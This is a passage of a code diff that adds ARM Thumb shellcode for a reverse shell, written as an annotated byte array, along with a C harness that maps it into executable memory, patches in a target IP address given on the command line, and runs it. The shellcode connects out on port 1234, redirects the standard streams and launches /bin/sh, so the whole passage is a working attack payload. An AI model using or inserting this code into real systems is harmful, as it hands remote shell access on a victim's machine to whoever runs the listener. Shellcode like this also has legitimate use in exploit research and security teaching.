0022 */ "\x01\xdf" /* svc #1 */ + /* 0024 */ "\x80\x46" /* mov r8, r0 */ + /* 0026 */ "\x18\xb4" /* push {r3, r4} */ + /* 0028 */ "\x69\x46" /* mov r1, sp */ + /* 002A */ "\x4a\x70" /* strb r2, [r1, #1] */ + /* 002C */ "\x10\x22" /* movs r2, #0x10 */ + /* 002E */ "\x02\x37" /* adds r7, #2 */ + /* 0030 */ "\x01\xdf" /* svc #1 */ + /* 0032 */ "\x03\x21" /* movs r1, #3 */ + /* 0034 */ "\x3f\x27" /* movs r7, #0x3f */ + /* 0036 */ "\x40\x46" /* mov r0, r8 */ + /* 0038 */ "\x01\x39" /* subs r1, #1 */ + /* 003A */ "\x01\xdf" /* svc #1 */ + /* 003C */ "\xfa\xd1" /* bne #0x34 */ + /* 003E */ "\x52\x40" /* eors r2, r2 */ + /* 0040 */ "\x17\x1c" /* adds r7, r2, #0 */ + /* 0042 */ "\xe0\xb4" /* push {r5, r6, r7} */ + /* 0044 */ "\x68\x46" /* mov r0, sp */ + /* 0046 */ "\x0b\x27" /* movs r7, #0xb */ + /* 0048 */ "\x01\xdf" /* svc #1 */ + /* 004A */ "\xc0\x46" /* mov r8, r8 */ + /* 004C */ "\x02\xff\x04\xd2" /* AF_INET, 1234 */ + /* 0050 */ "\x7f\x00\x00\x01" /* 127.0.0.1 */ + /* 0054 */ "\x2f\x62\x69\x6e" /* /bin */ + /* 0058 */ "\x2f\x2f\x73\x68" /* //sh */ +}; + +#define IP_ADDR_OFS 0x50 + +#endif + +// allocate read/write and executable memory +// copy data from code and execute +void exec_code(void *code, size_t code_len, char *ip_str) { + void *bin; + uint8_t *p; + in_addr_t ip; + + #ifdef CONNECT + ip=inet_addr(ip_str); + #endif + + bin=mmap (0, code_len, + PROT_EXEC | PROT_WRITE | PROT_READ, + MAP_ANON | MAP_PRIVATE, -1, 0); + + if (bin!=NULL) { + p=(uint8_t*)bin; + + memcpy (p, code, code_len); + #ifdef CONNECT + // copy ip + memcpy ((void*)&p[IP_ADDR_OFS], (void*)&ip, sizeof(ip)); + #endif + // execute + ((void(*)())bin)(); + + munmap (bin, code_len); + } +} + +int main(int argc, char *argv[]) { + + #ifdef CONNECT + if(argc!=2){ + printf("usage: test \n"); + return 0; + } + #endif + + exec_code(CODE, CODE_SIZE,argv[1]); + + return 0; +} \ No newline at end of file